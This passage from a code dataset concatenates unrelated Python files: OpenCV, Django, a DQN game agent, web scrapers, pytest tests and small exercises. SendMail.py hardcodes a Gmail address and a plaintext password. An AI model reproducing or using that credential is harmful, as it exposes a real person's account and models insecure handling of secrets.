numpy as np\nimport cv2\n\nix, iy = -1, -1\nmode = False\nimg1, img2 = None, None\n\ndef onMouse(event, x, y, flag, param):\n global ix, iy, mode, img1, img2\n\n if event == cv2.EVENT_LBUTTONDOWN:\n mode = True\n ix, iy = x, y\n elif event == cv2.EVENT_MOUSEMOVE:\n if mode:\n img1 = img2.copy()\n cv2.rectangle(img1, (ix, iy), (x,y), (0,0,255), 2)\n cv2.imshow('original', img1)\n elif event == cv2.EVENT_LBUTTONUP:\n mode = False\n if ix >= x:\n temp = ix\n ix = x\n x = temp\n if iy >= y:\n temp = iy\n iy = y\n y = temp\n\n cv2.rectangle(img1, (ix, iy), (x, y), (0,0,255), 2)\n roi = img1[iy:y, ix:x]\n backProjection(img2, roi)\n\n return\n\ndef backProjection(img, roi):\n hsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)\n hsvt = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n roihist = cv2.calcHist([hsv], [0,1], None, [180,256], [0,180, 0,256])\n cv2.normalize(roihist, roihist, 0, 255, cv2.NORM_MINMAX)\n dst = cv2.calcBackProject([hsvt], [0,1], roihist, [0,180, 0,256], 1)\n\n disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5,5))\n #disc = cv2.getStructuringElement(cv2.MORPH_CROSS, (5,5))\n #disc = np.ones((3,3), np.uint8)\n cv2.filter2D(dst, -1, disc, dst)\n\n ret, thr = cv2.threshold(dst, 50, 255, 0)\n thr = cv2.merge((thr,thr, thr))\n res = cv2.bitwise_and(img, thr)\n\n cv2.imshow('backproj', res)\n\ndef main():\n global img1, img2\n\n img1 = cv2.imread('E:/Python_Study/OpenCV/images/model.jpg')\n img2 = img1.copy()\n\n cv2.namedWindow('original')\n cv2.namedWindow('backproj')\n\n cv2.setMouseCallback('original', onMouse, param=None)\n\n cv2.imshow('backproj', img2)\n\n while True:\n cv2.imshow('original', img1)\n\n if cv2.waitKey(1) == 27:\n break\n\n cv2.destroyAllWindows()\n\nmain()","sub_path":"OpenCV/Ex27-1.ImageProjection.py","file_name":"Ex27-1.ImageProjection.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"609685869","text":"# -*- coding: utf-8 -*-\n# 
---------------------------------------------------------------------\n# Ericsson.SEOS.get_version\n# ---------------------------------------------------------------------\n# Copyright (C) 2007-2017 The NOC Project\n# See LICENSE for details\n# ---------------------------------------------------------------------\n\n# Python modules\nimport re\n# NOC modules\nfrom noc.core.script.base import BaseScript\nfrom noc.sa.interfaces.igetversion import IGetVersion\n\n\nclass Script(BaseScript):\n name = \"Ericsson.SEOS.get_version\"\n cache = True\n interface = IGetVersion\n\n rx_ver = re.compile(r\"^Active SBL\\s+:\\s+CXP:\\s+(?P\\S+.*)\\s+\"\n r\"^Passive (?:NPU|SBL)\\s+:\\s+CXP:\\s+[\\S\\s]+\"\n r\"^Active BNS\\s+:\\s+CXCR:\\s+(?P\\S+.*)$\",\n re.MULTILINE)\n\n def execute(self):\n ver = self.cli(\"show version\", cached=True)\n for match in self.rx_ver.finditer(ver):\n version = match.group(\"version\")\n sw_backup = match.group(\"sw_backup\")\n return {\n \"vendor\": \"Ericsson\",\n \"platform\": \"SEOS\",\n \"version\": version,\n \"attributes\": {\n \"sw_backup\": sw_backup\n }\n }\n","sub_path":"sa/profiles/Ericsson/SEOS/get_version.py","file_name":"get_version.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"224811813","text":"from django import forms\nfrom django.forms.forms import ErrorDict, NON_FIELD_ERRORS\nfrom django.forms.widgets import EmailInput, CheckboxInput\n\n\nclass DynamicErrorForm(forms.Form):\n def add_form_error(self, message):\n if not self._errors:\n self._errors = ErrorDict()\n if not NON_FIELD_ERRORS in self._errors:\n self._errors[NON_FIELD_ERRORS] = self.error_class()\n self._errors[NON_FIELD_ERRORS].append(message)\n\n\nclass CompetitionForm(DynamicErrorForm):\n\n HYLANDS_PARK = 'HP'\n WESTON_PARK = 'WP'\n VENUE_CHOICES = [\n (HYLANDS_PARK, \"HYLANDS PARK\"),\n (WESTON_PARK, \"WESTON PARK\"),\n ]\n\n def __init__(self, module, *args, **kwargs):\n super(CompetitionForm, self).__init__(*args, **kwargs)\n answer_choices = [\n ('Answer1', module.answer_1),\n ('Answer2', module.answer_2),\n ('Answer3', module.answer_3),\n ]\n self.fields['answer'] = forms.ChoiceField(answer_choices,\n widget=forms.RadioSelect())\n\n name = forms.CharField(label='Name', max_length=100)\n email = forms.EmailField(label='Email', widget=EmailInput(attrs={'class': 'panel--competition__email-signup'}))\n mobile = forms.CharField(label=\"Mobile\")\n postcode = forms.CharField(label=\"Postcode\", max_length=10)\n venue = forms.ChoiceField(choices=VENUE_CHOICES, widget=forms.RadioSelect())\n terms = forms.BooleanField(widget=CheckboxInput(attrs={'class': 'panel--competition__terms'}))\n","sub_path":"django/vfestival/apps/competition/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"248532368","text":"from django.shortcuts import render, redirect, HttpResponse\nfrom app01.models import *\n\n\n# Create your views here.\ndef add_book(request):\n \"\"\"\n 添加书籍信息的视图函数\n :param request:\n :return:\n \"\"\"\n if request.POST:\n title = request.POST.get(\"title\")\n price = request.POST.get(\"price\")\n date = request.POST.get(\"date\")\n publish = request.POST.get(\"publish\")\n authors = request.POST.getlist('authors')\n book_obj = Book.objects.create(title=title, price=price, pub_date=date, publish_id=publish)\n book_obj.authors.add(*authors)\n return 
redirect('app01:books')\n\n pub_list = Publish.objects.all()\n aut_list = Author.objects.all()\n\n return render(request, 'add_book.html', {'pub_list': pub_list, 'aut_list': aut_list})\n\n\ndef mod_book(request, id):\n mod_obj = Book.objects.filter(nid=id).first()\n if request.POST:\n title = request.POST.get(\"title\")\n price = request.POST.get(\"price\")\n date = request.POST.get(\"date\")\n publish = request.POST.get(\"publish\")\n authors = request.POST.getlist('authors')\n Book.objects.filter(pk=id).update(title=title, price=price, pub_date=date, publish_id=publish)\n mod_obj.authors.set(authors)\n return redirect('app01:books')\n\n pub_list = Publish.objects.all()\n aut_list = Author.objects.all()\n return render(request, 'modbook.html', {'mod_obj': mod_obj, 'pub_list': pub_list, 'aut_list': aut_list})\n\n\ndef books(request):\n book_list = Book.objects.all()\n\n return render(request, 'books.html', {'book_list': book_list})\n\n\ndef del_book(request, id):\n Book.objects.filter(nid=id).delete()\n return redirect('app01:books')\n\n\ndef aut_detail(request, id, tag):\n if tag == \"2\":\n print(id)\n book_list = Book.objects.filter(authors__nid=id).all()\n else:\n book_list = Book.objects.filter(publish_id=id).all()\n return render(request, 'book_detail.html', locals())\n","sub_path":"app01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"481518194","text":"from flurry.parser import FlurryBlockParser\nfrom django.conf import settings as dj_settings\nfrom exception import FlurryException\nimport settings\nimport utils\nimport mimetypes\nimport json\nimport os\nimport sys\n\n\nclass FlurryResource(object):\n\n def __init__(self):\n self.requires = []\n self.disk = \"\"\n self.type = \"\"\n self.uri = \"\"\n self.module = \"\"\n self.full_uri = \"\"\n self.suggest = []\n self.mime_type = \"\"\n self.provides = \"\"\n self.hash = \"\"\n self.head = False\n\n def getDiskUri(self):\n diskURI = self.disk\n if \"://\" in diskURI:\n diskURI = diskURI.split(\"://\")\n appname = diskURI[0]\n path = diskURI[1]\n uri = utils.get_path_for_application(appname) + \"/static/\" + path\n return uri\n else:\n return diskURI\n\n def renderResourceTag(self):\n uri = self.uri\n if dj_settings.DEBUG is True:\n if len(self.provides) > 0:\n uri += \"?r=\" + self.provides\n if self.type == \"css\":\n return \"\"\n elif self.type == \"js\":\n return \"\"\n else:\n return \"\"\n\n def load(self, data):\n self.requires = data['requires']\n self.disk = data['disk']\n self.type = data['type']\n self.uri = data['uri']\n self.module = data['module']\n self.suggest = data['suggest']\n self.mime_type = data['mime_type']\n self.hash = data['hash']\n if \"provides\" in data:\n self.provides = data['provides']\n self.head = data['head']\n\n def toData(self):\n data = {}\n data['requires'] = self.requires\n data['disk'] = self.disk\n data['type'] = self.type\n data['uri'] = self.uri\n data['suggest'] = self.suggest\n data['mime_type'] = self.mime_type\n data['hash'] = self.hash\n data['module'] = self.module\n data['head'] = self.head\n return data\n\n\nclass FlurryMap(object):\n\n def __init__(self):\n self.resources = {}\n self.resources_disk = {}\n self.resources_uri = {}\n self.resources_tag = {}\n self.modules = {}\n self.packages = {}\n self.new_id = 99999\n\n def loadResource(self, tag, resource):\n self.new_id += 1\n id = str(self.new_id)\n self.resources[id] = resource\n 
self.resources_disk[resource['disk']] = id\n self.resources_uri[resource['uri']] = id\n self.resources_tag[tag] = id\n\n def getResourceFromDisk(self, diskURI):\n diskURI = utils.get_flurry_new_disk_uri(diskURI)\n return self.getResourceFromFlurryDisk(diskURI)\n\n def getResourceFromFlurryDisk(self, diskURI):\n if diskURI in self.resources_disk:\n id = self.resources_disk[diskURI]\n return self.getResource(id)\n else:\n raise FlurryException(\"Resource Not Found \" + diskURI)\n\n def getResourceFromURI(self, webURI):\n if webURI in self.resources_uri:\n id = self.resources_uri[webURI]\n return self.getResource(id)\n else:\n if webURI in self.packages:\n return self.packages[webURI]\n raise FlurryException(\"Resource Not Found \" + webURI)\n\n def getResourceFromTag(self, tagName):\n if tagName in self.resources_tag:\n id = self.resources_tag[tagName]\n return self.getResource(id)\n else:\n raise FlurryException(\"Resource Not Found: \" + tagName)\n\n def getResources(self):\n data = []\n for i, resource in self.resources.iteritems():\n flurry_resource = FlurryResource()\n flurry_resource.load(resource)\n data.append(flurry_resource)\n return data\n\n def getResource(self, id):\n if str(id) in self.resources:\n resource = self.resources[str(id)]\n flurry_resource = FlurryResource()\n flurry_resource.load(resource)\n return flurry_resource\n else:\n raise FlurryException(\"Resource Not Found: \" + id)\n\n def getModule(self, module):\n if module in self.modules:\n module_depends = self.modules[module]\n return module_depends\n else:\n raise FlurryException(\"Module Not Found\")\n\n\nclass FlurryResourceWritable(FlurryResource):\n\n def __init__(self, diskURI, map_version):\n super(FlurryResourceWritable, self).__init__()\n self.provides = []\n diskURI = diskURI.replace(\"/src/src/\", \"/src/\")\n\n self.disk = diskURI\n\n diskURI = self.getDiskUri()\n\n file_stream = open(diskURI, \"rb\")\n self.hash = utils.md5_for_file(file_stream)\n file_stream.close()\n\n self.file_type = self._getFileType(diskURI)\n if self.file_type in settings.resource_types:\n self.type = settings.resource_types[self.file_type]\n else:\n self.type = \"resource\"\n\n if not self.type == \"js\":\n self.head = True\n\n self.uri = self._getURI(diskURI, map_version)\n self.mime_type = mimetypes.guess_type(self.uri)[0]\n\n if self.type in settings.docblock_types:\n block = FlurryBlockParser()\n block.parseBlock(diskURI)\n self.provides = block.getProvides()\n self.requires = block.getRequires()\n self.suggest = block.getSuggest()\n self.module = block.getModule()\n self.head = block.getHead()\n\n def _getFileType(self, filename):\n x = filename.split(\".\")\n return x[-1]\n\n def _getURI(self, filename, map_version):\n file_type = self._getFileType(filename)\n if file_type in settings.resource_types:\n file_type = settings.resource_types[file_type]\n return \"/rsrc/v1/\" + map_version + \"/r/\" + self.hash[2:10] + \".\" + file_type\n\n def build(self):\n data = self.toData()\n\n all_resources = []\n for provide in self.provides:\n if 'provides' in data:\n del data['provides']\n x = json.loads(json.dumps(data))\n x['provides'] = provide\n all_resources.append(x)\n\n if len(self.provides) == 0:\n data['provides'] = \"\"\n all_resources.append(data)\n\n return all_resources\n\n\nclass FlurryMapReader(FlurryMap):\n\n def __init__(self, filename):\n super(FlurryMapReader, self).__init__()\n\n map_file = open(filename, 'r')\n s_map = \"\"\n while 1:\n line = map_file.readline()\n if not line:\n break\n s_map += line\n 
map_file.close()\n\n try:\n data = json.loads(s_map)\n self.resources = data['resources']\n self.resources_disk = data['resources_disk']\n self.resources_uri = data['resources_uri']\n self.resources_tag = data['resources_tag']\n self.modules = data['modules']\n self.packages = data['packages']\n except ValueError:\n pass\n\n\nclass FlurryMapWritable(FlurryMap):\n\n def __init__(self, files):\n super(FlurryMapWritable, self).__init__()\n\n map_version = utils.generate_random_string(2)\n id = 1\n\n for resource_file in files:\n sys.stdout.write(\".\")\n resource = FlurryResourceWritable(resource_file, map_version)\n for inner_resource in resource.build():\n id = id + 1\n self.resources[id] = inner_resource\n\n for id, resource in self.resources.iteritems():\n sys.stdout.write(\".\")\n disk = resource['disk']\n self.resources_disk[disk] = id\n uri = resource['uri']\n self.resources_uri[disk] = id\n\n if len(resource['provides']) > 0:\n tag = resource['provides']\n self.resources_tag[tag] = id\n\n if len(resource['module']) > 0:\n for module in resource['module']:\n if not module in self.modules:\n self.modules[module] = []\n self.modules[module].append(tag)\n\n # Build module resources\n for module, resources in self.modules.iteritems():\n id = id + 1\n mod = FlurryResource()\n mod.requires = resources\n mod.type = \"module\"\n self.resources[id] = mod.toData()\n self.resources_tag[module] = id\n\n for module, resources in settings.packages.iteritems():\n uri = \"/rsrc/v1/\" + map_version + \"/r/\" + utils.md5_for_string(module)[2:10] + \".\" + utils.get_file_type(module)\n self.packages[uri] = resources\n\n def __str__(self):\n data = {}\n data['resources'] = self.resources\n data['resources_disk'] = self.resources_disk\n data['resources_uri'] = self.resources_uri\n data['resources_tag'] = self.resources_tag\n data['modules'] = self.modules\n data['packages'] = self.packages\n return json.dumps(data)\n\n def saveToFile(self, filename):\n if os.path.isfile(filename):\n old_map = FlurryMapReader(filename)\n for id, resource in old_map.resources.iteritems():\n for new_id, new_resource in self.resources.iteritems():\n if resource['disk'] == new_resource['disk']:\n if resource['hash'] == new_resource['hash']:\n #old_uri = self.resources[new_id]['uri']\n self.resources[new_id]['uri'] = resource['uri']\n self.resources_uri[resource['uri']] = new_id\n\n self.resources_uri = {}\n for id, resource in self.resources.iteritems():\n self.resources_uri[resource['uri']] = id\n\n map_file = open(filename, 'w')\n map_file.write(str(self))\n map_file.close()\n\n\n","sub_path":"src/flurry/map_model.py","file_name":"map_model.py","file_ext":"py","file_size_in_byte":10036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"519839465","text":"from random import randint\n\nimport alien_invasion.game_functions as gf\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pygame\nimport seaborn as sns\nfrom alien_invasion.game_items import GameItems\nfrom alien_invasion.game_stats import GameStats\nfrom keras.utils import to_categorical\nfrom alien_invasion.settings import Settings\nfrom tqdm import tqdm\nfrom alien_invasion.DQN import DQNAgent\n\n\n# FPS = 60\ndef plot_seaborn(array_counter, array_score):\n sns.set(color_codes=True)\n ax = sns.regplot(np.array([array_counter])[0], np.array([array_score])[0], color=\"b\", x_jitter=.1,\n line_kws={'color': 'green'})\n ax.set(xlabel='games', ylabel='score')\n plt.show()\n\n\ndef run_game():\n FPS = 1000\n\n # 
Initialize game, settings and create a screen object.\n    pygame.init()\n    fps_clock = pygame.time.Clock()\n    ai_settings = Settings()\n\n    # FOR THE DQN #\n\n    agent = DQNAgent()\n    counter_games = 0\n    score_plot = []\n    counter_plot = []\n    record = 0\n\n    # FOR THE DQN #\n\n    for i in tqdm(range(1, 150)):\n\n        # Create statistics.\n        stats = GameStats(ai_settings)\n\n        # Create game items.\n        game_items = GameItems(ai_settings, stats)\n\n        # Create a fleet of aliens.\n        gf.create_fleet(ai_settings, game_items)\n        played = False\n\n        gf.start_new_game(ai_settings, stats, game_items)\n\n        # Start the main loop for the game.\n        while stats.game_active:\n            stats.time_passed = fps_clock.tick(FPS) / 1000  # Time in seconds since previous loop.\n\n            gf.check_events(ai_settings, stats, game_items)\n\n            if stats.game_active:\n                # FOR THE DQN #\n                agent.epsilon = 80 - counter_games\n                state_old = gf.get_state(ai_settings, stats, game_items)\n                if randint(0, 200) < agent.epsilon:\n                    final_move = to_categorical(randint(0, 3), num_classes=4)\n                else:\n                    # predict action based on the old state\n                    prediction = agent.model.predict(state_old.reshape((1, 3536)))\n                    final_move = to_categorical(np.argmax(prediction[0]), num_classes=4)\n                # played = True\n\n                # FOR THE DQN #\n\n                # DQN #\n                # perform new move and get new state\n                beforeMove = stats.score\n                gf.do_move(final_move, ai_settings, stats, game_items)\n                game_items.ship.update(stats)\n                gf.update_bullets(ai_settings, stats, game_items)\n                gf.update_aliens(ai_settings, stats, game_items)\n                state_new = gf.get_state(ai_settings, stats, game_items)\n\n                reward = agent.set_reward(stats.score,beforeMove, stats.ships_left)\n\n                # train short memory base on the new action and state\n                agent.train_short_memory(state_old, final_move, reward, state_new, stats.game_active)\n\n                # store the new data into a long term memory\n                agent.remember(state_old, final_move, reward, state_new, stats.game_active)\n                # DQN #\n\n\n            gf.update_screen(ai_settings, stats, game_items)\n\n        # FOR THE DQN #\n        agent.replay_new(agent.memory)\n        counter_games += 1\n        print('Game', counter_games, '      Score:', stats.score)\n        score_plot.append(stats.score)\n        counter_plot.append(counter_games)\n        agent.model.save_weights('weights.hdf5')\n        plot_seaborn(counter_plot, score_plot)\n        # FOR THE DQN #\n\n\nif __name__ == '__main__':\n    run_game()\n","sub_path":"alien_invasion/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"51532524","text":"import argparse\nimport ConfigParser\nimport os\n\n\ndef compute_config(config_path, section):\n    class Foo:\n        def __init__(self):\n            pass\n    config = ConfigParser.ConfigParser()\n    config_path = os.path.abspath(config_path)\n    config.read(config_path)\n    class_ = Foo()\n    for item in config.items(section):\n        setattr(class_, item[0], item[1])\n    return class_\n\n\ndef parse_arguments():\n    arg_parser = argparse.ArgumentParser()\n\n    arg_parser.add_argument(\n        \"-c\", \"--config\",\n        help=\"path to the config file\",\n        default=os.path.join(\n            os.path.dirname(os.path.abspath(__file__)),\n            \"config\", \"server.cfg\"\n        )\n    )\n    return arg_parser\n\n\n","sub_path":"config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"66119622","text":"import cs50\n\n# get the height\nwhile True:\n    n = cs50.get_int(\"Height: \")\n    if n >= 1 and n <= 8:\n        break\n# 
print the pyrimad\nspace = n - 1\n\nfor x in range(n):\n for y in range(space):\n print(\" \", end=\"\")\n\n for z in range(n - space):\n print(\"#\", end=\"\")\n space = space - 1\n print()\n","sub_path":"pset6/Mario.py","file_name":"Mario.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"87632488","text":"from django.conf.urls import url\n\nfrom .views import index, product_detail, category, search\n\nurlpatterns = [\n url(r'^$', index),\n url(r'^index/$', index, name='index'),\n url(r'^product_detail/(?P\\d+)$', product_detail, name='product_detail'),\n url(r'^category/(?P\\d+)$', category, name='category'),\n url(r'^search/$', search, name='search'),\n\n]","sub_path":"store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"553938742","text":"# coding:utf-8\n \nimport re\nimport urllib.request\n \ndef get_content(url):\n \"\"\" Evilxr, \"\"\"\n html = urllib.request.urlopen(url)\n content = html.read().decode('utf-8')\n html.close()\n return content\n \ndef get_images(info):\n \"\"\"\" Download Baidu pictures.\n \n \"\"\"\n regex = r' class=\"BDE_Image\" src=\"(.+?\\.jpg)\" ' #只匹配括号里面的内容\n pat = re.compile(regex)\n images_code = re.findall(pat, info)\n \n i = 0\n for image_url in images_code:\n print (image_url)\n urllib.request.urlretrieve(image_url, '%s.jpg' % i)\n i = i +1\n print (len(images_code))\n \ninfo = get_content(\"http://tieba.baidu.com/p/2299704181\")\nprint (get_images(info))","sub_path":"test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"187274786","text":"#coding:utf-8\n__author__ = '613108'\n\nfrom selenium import webdriver\nfrom threading import Thread\nimport random\nimport time\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nsys.path.append(r'C:\\Users\\613108\\Desktop\\Project\\tool_self')\nimport My_Csv\n\nresult=[]\n\nclass Get_ProductInfo(Thread):\n def __init__(self,url_list):\n Thread.__init__(self)\n self.url_list=url_list\n\n def get_info(self):\n url_list=self.url_list\n try:\n driver=webdriver.PhantomJS()\n except:\n try:driver=webdriver.Chrome()\n except:pass\n driver.maximize_window()\n # try:\n for url in url_list:\n driver.get(url)\n print(url)\n for i in range(0,400*4,400):\n rand=random.gauss(100,100)\n scroll_height=i+rand\n js_scroll='var q=document.documentElement.scrollTop=%s'%scroll_height\n driver.execute_script(js_scroll)\n time.sleep(abs(random.gauss(1,0.5)))\n goods_frames=driver.find_elements_by_css_selector('.goods-item')\n print(len(goods_frames))\n for item in goods_frames:\n product_href=item.find_element_by_css_selector('.figure>a').get_attribute('href')\n print(product_href)\n # inner_frames=item.find_elements_by_css_selector('.item-info')\n # for item_2 in inner_frames:\n product_title=item.find_element_by_css_selector('.title>a').text\n product_price=item.find_element_by_css_selector('.price').text#.split('|')[0]\n try:product_price_del=item.find_element_by_class_name('.price>del').text#.split('|')[1]\n except:product_price_del='-'\n # try:product_adapt=item_2.find_element_by_class_name('item-adapt').text\n # except:product_adapt='-'\n # judge_count=item_2.find_element_by_class_name('item-comments').text[:-2]\n try:flag=item.find_element_by_css_selector('.flag').text\n 
except:flag='-'\n temp=[product_title,product_href,product_price,product_price_del,flag]\n result.append(temp)\n print('*'*50)\n for item_3 in temp:\n print(item_3)\n # except:pass\n driver.quit()\n\n def run(self):\n self.get_info()\n\nif __name__=='__main__':\n url_list=['http://list.mi.com/0-0-0-0-'+str(i+1)+'-0' for i in range(60)]\n Get_ProductInfo_thread=[]\n thread_count=10\n for i in range(thread_count):\n temp=Get_ProductInfo(url_list[((len(url_list)+thread_count-1)/thread_count)*i:((len(url_list)+thread_count-1)/thread_count)*(i+1)])\n Get_ProductInfo_thread.append(temp)\n for i in range(len(Get_ProductInfo_thread)):\n Get_ProductInfo_thread[i].start()\n for i in range(len(Get_ProductInfo_thread)):\n Get_ProductInfo_thread[i].join()\n\n title=['product_title','product_href','product_price','product_price_del','flag']\n writer=My_Csv.Write_Csv('d:/spider/xiaomi','xiaomi_product',title,result)\n writer.add_title_data()\n\n print('='*20+u'程序执行完毕,请检查所抓取的数据'+'='*20)","sub_path":"Official_store_project/xiaomi_project/product_info.py","file_name":"product_info.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"387977049","text":"import pytest\nimport pelorus\nfrom committime.collector_base import CommitMetric\n\n\n@pytest.mark.parametrize(\"start_time,end_time,format\",\n [\n ('2020-06-27T03:17:8Z',\n '2020-06-27T06:17:8Z', '%Y-%m-%dT%H:%M:%SZ'),\n ('2020-06-27T03:17:08.00000-0500', '2020-06-27T06:17:08.000000-0500',\n '%Y-%m-%dT%H:%M:%S.%f%z')\n ]\n )\ndef test_convert_date_time_to_timestamp(start_time, end_time, format):\n start_timestamp = 1593227828\n end_timestamp = 1593238628\n three_hours = 10800\n\n calc_start = pelorus.convert_date_time_to_timestamp(start_time, format)\n assert calc_start == start_timestamp\n calc_end = pelorus.convert_date_time_to_timestamp(end_time, format)\n assert calc_end == end_timestamp\n assert calc_end - calc_start == three_hours\n\n\n# Unit tests for the CommitMetric\n@pytest.mark.parametrize(\"appname\", [(\"pytest\")])\ndef test_commitmetric_initial(appname):\n metric = CommitMetric(appname)\n assert metric.repo_url is None\n assert metric.name == appname\n assert metric.repo_protocol is None\n assert metric.git_fqdn is None\n assert metric.repo_group is None\n assert metric.repo_project is None\n\n\n@pytest.mark.parametrize(\"url,repo_protocol,fqdn,project_name\",\n [\n ('https://dogs.git.foo/dogs/repo.git', 'https', 'dogs.git.foo', 'repo'),\n ('http://dogs.git.foo/dogs/repo.git', 'http', 'dogs.git.foo', 'repo'),\n ('http://noabank.git.foo/chase/git.git', 'http', 'noabank.git.foo', 'git'),\n ('ssh://git.moos.foo/maverick/tootsie.git', 'ssh', 'git.moos.foo', 'tootsie'),\n ('git@github.com:redhat-cop/pelorus.git', 'ssh', 'github.com', 'pelorus'),\n ('https://gitlab.com/firstgroup/secondgroup/myrepo.git', 'https', 'gitlab.com', 'myrepo')\n ]\n )\ndef test_commitmetric_repos(url, repo_protocol, fqdn, project_name):\n test_name = 'pytest'\n metric = CommitMetric(test_name)\n metric.name == test_name\n assert metric.repo_url is None\n assert metric.repo_protocol is None\n assert metric.git_fqdn is None\n assert metric.repo_group is None\n assert metric.repo_project is None\n metric.repo_url = url\n assert metric.repo_url is not None\n assert metric.repo_url == url\n assert metric.repo_protocol == repo_protocol\n assert metric.git_fqdn is not None\n assert metric.repo_group is not None\n assert metric.repo_project is not None\n assert metric.git_fqdn == 
fqdn\n# assert metric.git_server == str(protocol + '://' + fqdn)\n    assert metric.repo_project == project_name\n\n\n@pytest.mark.parametrize(\"malformed_url\", [\n    \"kmoos://myprotocol/buffy/noext/noext\",\n    \"notvalid://breakme/snoopy/gtist.git\"\n])\ndef test_malformed_git_url(malformed_url):\n    test_name = 'pytest'\n    metric = CommitMetric(test_name)\n    metric.name = test_name\n    with pytest.raises(ValueError):\n        metric.repo_url = malformed_url\n","sub_path":"exporters/test_exporters.py","file_name":"test_exporters.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"375162461","text":"import zipfile\nimport io\n\ndef unzipped(input_zip):\n    input_zip = zipfile.ZipFile(io.BytesIO(input_zip))\n    return {name: input_zip.read(name) for name in input_zip.namelist()}\n\ndef zipped(input_clear, filename):\n    buff = io.BytesIO()\n    zip_archive = zipfile.ZipFile(buff, mode=\"w\", compression=zipfile.ZIP_DEFLATED)\n    zip_archive.writestr(filename, input_clear)\n    zip_archive.close()\n    return buff.getvalue()\n","sub_path":"src/zip.py","file_name":"zip.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"537413414","text":"import smtplib\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nfrom email.mime.text import MIMEText\n#from email import encoders\nimport os\n\ngmail_user = \"myoung0710@gmail.com\" # gmail address\ngmail_pwd = \"sksajtwu123\" # gmail password\n\ndef send_gmail(to, subject, text):\n    msg = MIMEMultipart()\n    msg['From'] = gmail_user\n    msg['To'] = to\n    msg['Subject'] = subject\n    msg.attach(MIMEText(text))\n    part = MIMEBase('application', 'octet-stream')\n    #part.set_payload(open(attach, 'rb').read())\n    #encoders.encode_base64(part)\n    #part.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % os.path.basename(attach))\n    msg.attach(part)\n    mailServer = smtplib.SMTP(\"smtp.gmail.com\", 587)\n    mailServer.ehlo()\n    mailServer.starttls()\n    mailServer.ehlo()\n    mailServer.login(gmail_user, gmail_pwd)\n    mailServer.sendmail(gmail_user, to, msg.as_string())\n    mailServer.quit()\n\nsend_gmail(\"myoung0710@naver.com\", \"SendMail Test\", \"This is a Send_gamil function test.\" )\n","sub_path":"SendMail.py","file_name":"SendMail.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"241980550","text":"\"\"\"def add(a, b):\r\n    return a + b\r\nprint (add(1,2))\r\n\r\n# with Lambda\r\nadd = lambda x, y : x + y\r\n\r\nprint ( add(3,4))\r\n\"\"\"\r\n\r\nmy_list = [1,2,3,4,5,6,7]\r\n\r\nnew_list = list(map(lambda x : x * 2, my_list))\r\n\r\n\r\nprint (new_list)\r\n#combine first and last name to single \"full name\"\r\nfull_name = lambda fn, ln: fn.strip().title() + \" \" + ln.strip().title()\r\nprint(full_name(\"sasd\", \"shandj\"))\r\n\r\n\r\n","sub_path":"lambdafun.py","file_name":"lambdafun.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"598906563","text":"#Reads a number from the keyboard\n#If it is:\n#-even\n#-between -10 and 40\n#-negative\n#Note: a single condition\n\n#Test cases:\n#-30,-11,-10,-6,-5,0,6,40,41,234\n\n#coding:utf-8\nnum = int(input(\"Please enter a number: \"))\nif num % 2 == 0 or (num >=-10 and num <= 40) or num < 0:\n    print(\"Your number is even, it is 
between -10 and 40, or it is negative\")\nelse:\n    print(\"Sorry, your number is not in the list\")\n","sub_path":"Python/ejercicio-condicion-chunga.py","file_name":"ejercicio-condicion-chunga.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
